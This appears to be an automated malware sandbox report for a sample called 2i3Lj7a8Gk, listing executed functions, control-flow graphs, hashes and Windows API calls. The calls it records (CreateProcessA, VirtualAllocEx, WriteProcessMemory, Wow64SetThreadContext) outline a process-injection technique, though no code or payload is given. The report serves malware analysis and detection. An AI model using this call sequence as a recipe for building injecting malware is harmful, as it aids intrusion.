GetCurrentProcess 26627->26629 26630 110d646 26627->26630 26628->26627 26633 110d683 26629->26633 26630->26629 26631 110d6ab GetCurrentThreadId 26632 110d6dc 26631->26632 26633->26631

                                                                                Executed Functions

                                                                                Function 06FD0A18 Relevance: .2, Instructions: 185COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1729639679.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_6fd0000_2i3Lj7a8Gk.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 5b95c5348b27421a5c3843f1fee701028b457aeee67598b8beb0a5a43cee998b
                                                                                • Instruction ID: d3f1d3fb68d530a499dc001ecf4ef16be53ea9217b10dc49832192f83a9a8518
                                                                                • Opcode Fuzzy Hash: 5b95c5348b27421a5c3843f1fee701028b457aeee67598b8beb0a5a43cee998b
                                                                                • Instruction Fuzzy Hash: CA710575D05209DFDB48CFE6E4809AEFBB2FF89310F14952AE415AB264DB34A942CF50
                                                                                Function 06FD0A28 Relevance: .2, Instructions: 184COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1729639679.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_6fd0000_2i3Lj7a8Gk.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: e20b0e76347dfd9f39c68ab6bd5d1c6969a988ddc1130f8c90d3ab6210c2ac51
                                                                                • Instruction ID: b3d4fce73b74ea7b91a768fb76ea622375d175122894290fcbc9392f65269ce2
                                                                                • Opcode Fuzzy Hash: e20b0e76347dfd9f39c68ab6bd5d1c6969a988ddc1130f8c90d3ab6210c2ac51
                                                                                • Instruction Fuzzy Hash: EA710671D05209DFDB44CFE6D58099EFBB2FF89300F14952AE415AB264DB34A942CF50
                                                                                Function 0110D568 Relevance: 6.1, APIs: 4, Instructions: 132threadCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 294 110d568-110d607 GetCurrentProcess 298 110d610-110d644 GetCurrentThread 294->298 299 110d609-110d60f 294->299 300 110d646-110d64c 298->300 301 110d64d-110d681 GetCurrentProcess 298->301 299->298 300->301 303 110d683-110d689 301->303 304 110d68a-110d6a5 call 110d747 301->304 303->304 307 110d6ab-110d6da GetCurrentThreadId 304->307 308 110d6e3-110d745 307->308 309 110d6dc-110d6e2 307->309 309->308
                                                                                APIs
                                                                                • GetCurrentProcess.KERNEL32 ref: 0110D5F6
                                                                                • GetCurrentThread.KERNEL32 ref: 0110D633
                                                                                • GetCurrentProcess.KERNEL32 ref: 0110D670
                                                                                • GetCurrentThreadId.KERNEL32 ref: 0110D6C9
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722705309.0000000001100000.00000040.00000800.00020000.00000000.sdmp, Offset: 01100000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_1100000_2i3Lj7a8Gk.jbxd
                                                                                Similarity
                                                                                • API ID: Current$ProcessThread
                                                                                • String ID:
                                                                                • API String ID: 2063062207-0
                                                                                • Opcode ID: 0ec294eb14566529ced3526a35929a6595d53103f06221e2cad91ead648b30cd
                                                                                • Instruction ID: 457a6249cd8bfdd6d63a524b235d106b391ea43d52adb4a184d9eab6f5bcb1da
                                                                                • Opcode Fuzzy Hash: 0ec294eb14566529ced3526a35929a6595d53103f06221e2cad91ead648b30cd
                                                                                • Instruction Fuzzy Hash: 225144B0D003098FDB18DFA9D948BAEBBF1EB48314F20C459E419A72A0DB759984CF65
                                                                                Function 0110D578 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 316 110d578-110d607 GetCurrentProcess 320 110d610-110d644 GetCurrentThread 316->320 321 110d609-110d60f 316->321 322 110d646-110d64c 320->322 323 110d64d-110d681 GetCurrentProcess 320->323 321->320 322->323 325 110d683-110d689 323->325 326 110d68a-110d6a5 call 110d747 323->326 325->326 329 110d6ab-110d6da GetCurrentThreadId 326->329 330 110d6e3-110d745 329->330 331 110d6dc-110d6e2 329->331 331->330
                                                                                APIs
                                                                                • GetCurrentProcess.KERNEL32 ref: 0110D5F6
                                                                                • GetCurrentThread.KERNEL32 ref: 0110D633
                                                                                • GetCurrentProcess.KERNEL32 ref: 0110D670
                                                                                • GetCurrentThreadId.KERNEL32 ref: 0110D6C9
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722705309.0000000001100000.00000040.00000800.00020000.00000000.sdmp, Offset: 01100000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_1100000_2i3Lj7a8Gk.jbxd
                                                                                Similarity
                                                                                • API ID: Current$ProcessThread
                                                                                • String ID:
                                                                                • API String ID: 2063062207-0
                                                                                • Opcode ID: 11a6321d924b7c80914bf93dfeb016b866bfcd2cf56a027e52ad98bbf3c87d33
                                                                                • Instruction ID: 5bd628eeea142d01bb7c5debf0ce6892063e0483bfafa24452063882f53a1bdb
                                                                                • Opcode Fuzzy Hash: 11a6321d924b7c80914bf93dfeb016b866bfcd2cf56a027e52ad98bbf3c87d33
                                                                                • Instruction Fuzzy Hash: CC5136B0D003098FDB18DFAAD948B9EBBF5EF48314F20C459E419A72A0DB759984CF65
                                                                                Function 06FDB2E4 Relevance: 1.8, APIs: 1, Instructions: 274processCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 382 6fdb2e4-6fdb2e8 383 6fdb2ea-6fdb385 382->383 384 6fdb295-6fdb2aa 382->384 386 6fdb3be-6fdb3de 383->386 387 6fdb387-6fdb391 383->387 390 6fdb2ac-6fdb2b2 384->390 391 6fdb2b3-6fdb2d8 384->391 396 6fdb417-6fdb446 386->396 397 6fdb3e0-6fdb3ea 386->397 387->386 389 6fdb393-6fdb395 387->389 393 6fdb3b8-6fdb3bb 389->393 394 6fdb397-6fdb3a1 389->394 390->391 393->386 398 6fdb3a5-6fdb3b4 394->398 399 6fdb3a3 394->399 409 6fdb47f-6fdb539 CreateProcessA 396->409 410 6fdb448-6fdb452 396->410 397->396 401 6fdb3ec-6fdb3ee 397->401 398->398 402 6fdb3b6 398->402 399->398 404 6fdb411-6fdb414 401->404 405 6fdb3f0-6fdb3fa 401->405 402->393 404->396 407 6fdb3fc 405->407 408 6fdb3fe-6fdb40d 405->408 407->408 408->408 411 6fdb40f 408->411 421 6fdb53b-6fdb541 409->421 422 6fdb542-6fdb5c8 409->422 410->409 412 6fdb454-6fdb456 410->412 411->404 413 6fdb479-6fdb47c 412->413 414 6fdb458-6fdb462 412->414 413->409 416 6fdb464 414->416 417 6fdb466-6fdb475 414->417 416->417 417->417 418 6fdb477 417->418 418->413 421->422 432 6fdb5d8-6fdb5dc 422->432 433 6fdb5ca-6fdb5ce 422->433 435 6fdb5ec-6fdb5f0 432->435 436 6fdb5de-6fdb5e2 432->436 433->432 434 6fdb5d0 433->434 434->432 438 6fdb600-6fdb604 435->438 439 6fdb5f2-6fdb5f6 435->439 436->435 437 6fdb5e4 436->437 437->435 441 6fdb616-6fdb61d 438->441 442 6fdb606-6fdb60c 438->442 439->438 440 6fdb5f8 439->440 440->438 443 6fdb61f-6fdb62e 441->443 444 6fdb634 441->444 442->441 443->444 446 6fdb635 444->446 446->446
                                                                                APIs
                                                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06FDB526
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1729639679.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_6fd0000_2i3Lj7a8Gk.jbxd
                                                                                Similarity
                                                                                • API ID: CreateProcess
                                                                                • String ID:
                                                                                • API String ID: 963392458-0
                                                                                • Opcode ID: e22c4a3b0683cb4434cce421ace7a90cb3e657a76a4f0b3903f22d7ade7638b1
                                                                                • Instruction ID: cd69f6573295b7f81b99a4c5cac3dbb683b4fdca034e9fd949a3f62904071614
                                                                                • Opcode Fuzzy Hash: e22c4a3b0683cb4434cce421ace7a90cb3e657a76a4f0b3903f22d7ade7638b1
                                                                                • Instruction Fuzzy Hash: F0A19DB1D00219CFDB60DF68C8417EEBBB2FF48314F1985A9D848A7290DB74A985CF91
                                                                                Function 06FDB2F0 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 447 6fdb2f0-6fdb385 449 6fdb3be-6fdb3de 447->449 450 6fdb387-6fdb391 447->450 455 6fdb417-6fdb446 449->455 456 6fdb3e0-6fdb3ea 449->456 450->449 451 6fdb393-6fdb395 450->451 453 6fdb3b8-6fdb3bb 451->453 454 6fdb397-6fdb3a1 451->454 453->449 457 6fdb3a5-6fdb3b4 454->457 458 6fdb3a3 454->458 466 6fdb47f-6fdb539 CreateProcessA 455->466 467 6fdb448-6fdb452 455->467 456->455 459 6fdb3ec-6fdb3ee 456->459 457->457 460 6fdb3b6 457->460 458->457 461 6fdb411-6fdb414 459->461 462 6fdb3f0-6fdb3fa 459->462 460->453 461->455 464 6fdb3fc 462->464 465 6fdb3fe-6fdb40d 462->465 464->465 465->465 468 6fdb40f 465->468 478 6fdb53b-6fdb541 466->478 479 6fdb542-6fdb5c8 466->479 467->466 469 6fdb454-6fdb456 467->469 468->461 470 6fdb479-6fdb47c 469->470 471 6fdb458-6fdb462 469->471 470->466 473 6fdb464 471->473 474 6fdb466-6fdb475 471->474 473->474 474->474 475 6fdb477 474->475 475->470 478->479 489 6fdb5d8-6fdb5dc 479->489 490 6fdb5ca-6fdb5ce 479->490 492 6fdb5ec-6fdb5f0 489->492 493 6fdb5de-6fdb5e2 489->493 490->489 491 6fdb5d0 490->491 491->489 495 6fdb600-6fdb604 492->495 496 6fdb5f2-6fdb5f6 492->496 493->492 494 6fdb5e4 493->494 494->492 498 6fdb616-6fdb61d 495->498 499 6fdb606-6fdb60c 495->499 496->495 497 6fdb5f8 496->497 497->495 500 6fdb61f-6fdb62e 498->500 501 6fdb634 498->501 499->498 500->501 503 6fdb635 501->503 503->503
                                                                                APIs
                                                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06FDB526
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1729639679.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_6fd0000_2i3Lj7a8Gk.jbxd
                                                                                Similarity
                                                                                • API ID: CreateProcess
                                                                                • String ID:
                                                                                • API String ID: 963392458-0
                                                                                • Opcode ID: 30d5be2d154b1f6a17f77481d3230854129b3fc227d6468214828490616785f7
                                                                                • Instruction ID: 93bf36ae884122839d202ed15e13c427d9f942203a055d3573dead574d4afc6a
                                                                                • Opcode Fuzzy Hash: 30d5be2d154b1f6a17f77481d3230854129b3fc227d6468214828490616785f7
                                                                                • Instruction Fuzzy Hash: 9B916CB1D00219CFDB50CF68C841BEEBBB2FF49314F1985A9D848A7280DB74A985CF91
                                                                                Function 0110B2E1 Relevance: 1.7, APIs: 1, Instructions: 201COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 504 110b2e1-110b2ff 505 110b301-110b30e call 1108840 504->505 506 110b32b-110b32f 504->506 511 110b310 505->511 512 110b324 505->512 508 110b331-110b33b 506->508 509 110b343-110b384 506->509 508->509 515 110b391-110b39f 509->515 516 110b386-110b38e 509->516 561 110b316 call 110b588 511->561 562 110b316 call 110b579 511->562 512->506 517 110b3a1-110b3a6 515->517 518 110b3c3-110b3c5 515->518 516->515 520 110b3b1 517->520 521 110b3a8-110b3af call 110acc4 517->521 523 110b3c8-110b3cf 518->523 519 110b31c-110b31e 519->512 522 110b460-110b520 519->522 525 110b3b3-110b3c1 520->525 521->525 554 110b522-110b525 522->554 555 110b528-110b553 GetModuleHandleW 522->555 526 110b3d1-110b3d9 523->526 527 110b3dc-110b3e3 523->527 525->523 526->527 529 110b3f0-110b3f9 call 110acd4 527->529 530 110b3e5-110b3ed 527->530 535 110b406-110b40b 529->535 536 110b3fb-110b403 529->536 530->529 537 110b429-110b42d 535->537 538 110b40d-110b414 535->538 536->535 559 110b430 call 110b860 537->559 560 110b430 call 110b888 537->560 538->537 540 110b416-110b426 call 110ace4 call 110acf4 538->540 540->537 543 110b433-110b436 545 110b438-110b456 543->545 546 110b459-110b45f 543->546 545->546 554->555 556 110b555-110b55b 555->556 557 110b55c-110b570 555->557 556->557 559->543 560->543 561->519 562->519
                                                                                APIs
                                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 0110B546
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722705309.0000000001100000.00000040.00000800.00020000.00000000.sdmp, Offset: 01100000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_1100000_2i3Lj7a8Gk.jbxd
                                                                                Similarity
                                                                                • API ID: HandleModule
                                                                                • String ID:
                                                                                • API String ID: 4139908857-0
                                                                                • Opcode ID: 1be791a7dbc259e35534ffb946ea66e92152e6f326b8b1017ed7889d4d7a2be6
                                                                                • Instruction ID: 6028b6e85f70a5ec36427fc0960bb4bba3b798a3b0a36c84a8075e7b64e67ad2
                                                                                • Opcode Fuzzy Hash: 1be791a7dbc259e35534ffb946ea66e92152e6f326b8b1017ed7889d4d7a2be6
                                                                                • Instruction Fuzzy Hash: 998167B4A04B058FD729DF29D04475ABBF1FF88304F10892DD58ADBA80DBB5E945CB94
                                                                                Function 0110480C Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 671 110480c-1105cd1 CreateActCtxA 674 1105cd3-1105cd9 671->674 675 1105cda-1105d34 671->675 674->675 682 1105d43-1105d47 675->682 683 1105d36-1105d39 675->683 684 1105d58 682->684 685 1105d49-1105d55 682->685 683->682 686 1105d59 684->686 685->684 686->686
                                                                                APIs
                                                                                • CreateActCtxA.KERNEL32(?), ref: 01105CC1
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722705309.0000000001100000.00000040.00000800.00020000.00000000.sdmp, Offset: 01100000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_1100000_2i3Lj7a8Gk.jbxd
                                                                                Similarity
                                                                                • API ID: Create
                                                                                • String ID:
                                                                                • API String ID: 2289755597-0
                                                                                • Opcode ID: b41e367e81e42d32c424ddcefd2629f78500f7983c9407937d336f3f0de30a84
                                                                                • Instruction ID: 6a48b1b14ac03801400eb71e56df19d6bc190b8ed34f207b23c9f13affa39dec
                                                                                • Opcode Fuzzy Hash: b41e367e81e42d32c424ddcefd2629f78500f7983c9407937d336f3f0de30a84
                                                                                • Instruction Fuzzy Hash: 7041D2B0C0071DCBDB29DFA9C948B9DBBB6BF45304F20805AD408AB291DBB56945CF91
                                                                                Function 01105C04 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 688 1105c04-1105cd1 CreateActCtxA 690 1105cd3-1105cd9 688->690 691 1105cda-1105d34 688->691 690->691 698 1105d43-1105d47 691->698 699 1105d36-1105d39 691->699 700 1105d58 698->700 701 1105d49-1105d55 698->701 699->698 702 1105d59 700->702 701->700 702->702
                                                                                APIs
                                                                                • CreateActCtxA.KERNEL32(?), ref: 01105CC1
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722705309.0000000001100000.00000040.00000800.00020000.00000000.sdmp, Offset: 01100000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_1100000_2i3Lj7a8Gk.jbxd
                                                                                Similarity
                                                                                • API ID: Create
                                                                                • String ID:
                                                                                • API String ID: 2289755597-0
                                                                                • Opcode ID: 17e78072a0e3fbff3611aaae314bbb1a6c763225815a16f6ab78c04cd1353f0e
                                                                                • Instruction ID: 450c2dfd803b92a70cc4c407a7b1bcf99de2b25c967aef5c13e563bccfe72e04
                                                                                • Opcode Fuzzy Hash: 17e78072a0e3fbff3611aaae314bbb1a6c763225815a16f6ab78c04cd1353f0e
                                                                                • Instruction Fuzzy Hash: 0341D3B0C00719CEDB29DFA9C944BDEBBB6BF45314F20815AD408AB291DBB56946CF90
                                                                                Function 06FDAECA Relevance: 1.6, APIs: 1, Instructions: 85threadCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 704 6fdaeca-6fdaecc 705 6fdaece-6fdaf1b 704->705 706 6fdae83-6fdae98 704->706 713 6fdaf1d-6fdaf29 705->713 714 6fdaf2b-6fdaf5b Wow64SetThreadContext 705->714 708 6fdae9a-6fdaea0 706->708 709 6fdaea2 706->709 710 6fdaea5-6fdaeba 708->710 709->710 713->714 717 6fdaf5d-6fdaf63 714->717 718 6fdaf64-6fdaf94 714->718 717->718
                                                                                APIs
                                                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06FDAF4E
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1729639679.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_6fd0000_2i3Lj7a8Gk.jbxd
                                                                                Similarity
                                                                                • API ID: ContextThreadWow64
                                                                                • String ID:
                                                                                • API String ID: 983334009-0
                                                                                • Opcode ID: 929af213bbe82d1e229b26d9bdfead22b0fa88b60f40dbdb3c5b2f172aca54db
                                                                                • Instruction ID: 2c3ded52bda9316cb3452e25ebbc0544a02870109a6ab169a08080584aa6a721
                                                                                • Opcode Fuzzy Hash: 929af213bbe82d1e229b26d9bdfead22b0fa88b60f40dbdb3c5b2f172aca54db
                                                                                • Instruction Fuzzy Hash: 373147B1D002498FDB10DFAAC485BEEFBF1EF88324F14802AD459A7241DB38A945CB94
                                                                                Function 06FDB060 Relevance: 1.6, APIs: 1, Instructions: 75injectionCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 722 6fdb060-6fdb0b6 725 6fdb0b8-6fdb0c4 722->725 726 6fdb0c6-6fdb105 WriteProcessMemory 722->726 725->726 728 6fdb10e-6fdb13e 726->728 729 6fdb107-6fdb10d 726->729 729->728
                                                                                APIs
                                                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06FDB0F8
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1729639679.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_6fd0000_2i3Lj7a8Gk.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryProcessWrite
                                                                                • String ID:
                                                                                • API String ID: 3559483778-0
                                                                                • Opcode ID: 7c5b075bd1718a1bcb408c95f107c5a5f95ad33a2f5ddac90cd3722a4c1b2103
                                                                                • Instruction ID: 5645508b81d3d4b2417fd242d52cefb0425c71329cb96ecef025f011fd051703
                                                                                • Opcode Fuzzy Hash: 7c5b075bd1718a1bcb408c95f107c5a5f95ad33a2f5ddac90cd3722a4c1b2103
                                                                                • Instruction Fuzzy Hash: F62168B5D003499FCB10CFAAC885BDEBBF5FF48310F10842AE918A7240C778A955CBA0
                                                                                Function 06FDB068 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 733 6fdb068-6fdb0b6 735 6fdb0b8-6fdb0c4 733->735 736 6fdb0c6-6fdb105 WriteProcessMemory 733->736 735->736 738 6fdb10e-6fdb13e 736->738 739 6fdb107-6fdb10d 736->739 739->738
                                                                                APIs
                                                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06FDB0F8
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1729639679.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_6fd0000_2i3Lj7a8Gk.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryProcessWrite
                                                                                • String ID:
                                                                                • API String ID: 3559483778-0
                                                                                • Opcode ID: afdd303d33008e63ef27f0095beb918d60d80837117f574eb45d2114434e7ac6
                                                                                • Instruction ID: 6e74cba42382e269cf96529f39c661cc93c8086e829d8f8cc4566edfcd62ad86
                                                                                • Opcode Fuzzy Hash: afdd303d33008e63ef27f0095beb918d60d80837117f574eb45d2114434e7ac6
                                                                                • Instruction Fuzzy Hash: 74214AB1D003499FDB10DFAAC985BDEBBF5FF48310F14842AE919A7240C778A954DBA4
                                                                                Function 06FDF5F0 Relevance: 1.6, APIs: 1, Instructions: 68windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PostMessageW.USER32(?,00000010,00000000,?), ref: 06FDF655
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1729639679.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_6fd0000_2i3Lj7a8Gk.jbxd
                                                                                Similarity
                                                                                • API ID: MessagePost
                                                                                • String ID:
                                                                                • API String ID: 410705778-0
                                                                                • Opcode ID: 2615a219edd67a572e8b8a89adb93c628efc297b9a466d8aa2d3b81da0a81bb3
                                                                                • Instruction ID: cdfb0cca5901683cb80340e7868b5f58b1a6b2fc53cf3ca4a747ed9eb364cd90
                                                                                • Opcode Fuzzy Hash: 2615a219edd67a572e8b8a89adb93c628efc297b9a466d8aa2d3b81da0a81bb3
                                                                                • Instruction Fuzzy Hash: 3E2136B6800349CFDB10DF9AD848BDEFBF4EB48324F24841AD559A3650C375A584CFA1
                                                                                Function 0110D7B8 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0110D847
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722705309.0000000001100000.00000040.00000800.00020000.00000000.sdmp, Offset: 01100000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_1100000_2i3Lj7a8Gk.jbxd
                                                                                Similarity
                                                                                • API ID: DuplicateHandle
                                                                                • String ID:
                                                                                • API String ID: 3793708945-0
                                                                                • Opcode ID: b83448edcd7d6f9b3667bff943dfe5b30117069ac0e23f2d2cdadd39b181b742
                                                                                • Instruction ID: adac0b7dad18afea92a9bdd622aa3ccb14dbe850288e3961a404813d755e70a8
                                                                                • Opcode Fuzzy Hash: b83448edcd7d6f9b3667bff943dfe5b30117069ac0e23f2d2cdadd39b181b742
                                                                                • Instruction Fuzzy Hash: 4D21E4B5D002489FDB10DFAAD984ADEFFF5EB48310F14801AE918A7351D379AA44DFA1
                                                                                Function 06FDB150 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06FDB1D8
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1729639679.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_6fd0000_2i3Lj7a8Gk.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryProcessRead
                                                                                • String ID:
                                                                                • API String ID: 1726664587-0
                                                                                • Opcode ID: 2d06f528871f634887e7348b675abba9daea0dc3ebc487a9f4628569c0a4e167
                                                                                • Instruction ID: c33240b3dafc19602a88f984294f71d20583525a9ee6aed8839a6dacce9d6432
                                                                                • Opcode Fuzzy Hash: 2d06f528871f634887e7348b675abba9daea0dc3ebc487a9f4628569c0a4e167
                                                                                • Instruction Fuzzy Hash: 862124B19003498FCB10DFA9C884AEEBBF1FF48320F14842AE959A7241C738A555DB61
                                                                                Function 06FDB158 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06FDB1D8
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1729639679.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_6fd0000_2i3Lj7a8Gk.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryProcessRead
                                                                                • String ID:
                                                                                • API String ID: 1726664587-0
                                                                                • Opcode ID: 6d52bb8fa97914c0e1f7258a58c9cb9661594d97a6c54fd0cab8dfa2b5aef41e
                                                                                • Instruction ID: 326ba948b013ec09d7b69683816454021125ee0c614c410d2a7b48e786ff8180
                                                                                • Opcode Fuzzy Hash: 6d52bb8fa97914c0e1f7258a58c9cb9661594d97a6c54fd0cab8dfa2b5aef41e
                                                                                • Instruction Fuzzy Hash: 942139B1C003499FCB10DFAAC845ADEFBF5FF48310F50842AE919A7240C778A944DBA5
                                                                                Function 06FDAED0 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06FDAF4E
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1729639679.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_6fd0000_2i3Lj7a8Gk.jbxd
                                                                                Similarity
                                                                                • API ID: ContextThreadWow64
                                                                                • String ID:
                                                                                • API String ID: 983334009-0
                                                                                • Opcode ID: 8a1b46468529c951b1ebc36e081756b01dc42f0338713c617d3a039272e08a62
                                                                                • Instruction ID: 8c69f4dd8d012bf4a0b07a51f70dcdfe641cb084c5c485495f35eb112c3e8121
                                                                                • Opcode Fuzzy Hash: 8a1b46468529c951b1ebc36e081756b01dc42f0338713c617d3a039272e08a62
                                                                                • Instruction Fuzzy Hash: 092129B1D003098FDB10DFAAC4857EEBBF5EF88324F14842AD559A7241CB78A945CFA5
                                                                                Function 0110D7C0 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0110D847
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722705309.0000000001100000.00000040.00000800.00020000.00000000.sdmp, Offset: 01100000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_1100000_2i3Lj7a8Gk.jbxd
                                                                                Similarity
                                                                                • API ID: DuplicateHandle
                                                                                • String ID:
                                                                                • API String ID: 3793708945-0
                                                                                • Opcode ID: 53a49de093ff5e954727a982803eb74f87647ac4b9ecf6b4fc3ff65806c4122c
                                                                                • Instruction ID: dc49ec7aa3362a37e34cfdf9748d9eda72a68a0820fef4a6858a946960b80e65
                                                                                • Opcode Fuzzy Hash: 53a49de093ff5e954727a982803eb74f87647ac4b9ecf6b4fc3ff65806c4122c
                                                                                • Instruction Fuzzy Hash: C521C4B5D002489FDB10DF9AD984ADEBFF5EB48310F14841AE918A3350D774A954CFA5
                                                                                Function 06FDAFA0 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06FDB016
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1729639679.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_6fd0000_2i3Lj7a8Gk.jbxd
                                                                                Similarity
                                                                                • API ID: AllocVirtual
                                                                                • String ID:
                                                                                • API String ID: 4275171209-0
                                                                                • Opcode ID: bdeb9f0ddaa073e3f54920e0ecb0f9c437e65694f57a651b97e8a5dd508b23d0
                                                                                • Instruction ID: eab537c00d793384c4ba0daf7f3b235dec0f4cc14f1a76601354e26c785512b7
                                                                                • Opcode Fuzzy Hash: bdeb9f0ddaa073e3f54920e0ecb0f9c437e65694f57a651b97e8a5dd508b23d0
                                                                                • Instruction Fuzzy Hash: 511159B18003489FCB20DFAAC845ADEBFF6EB88320F148419E519A7250CB75A544CBA1
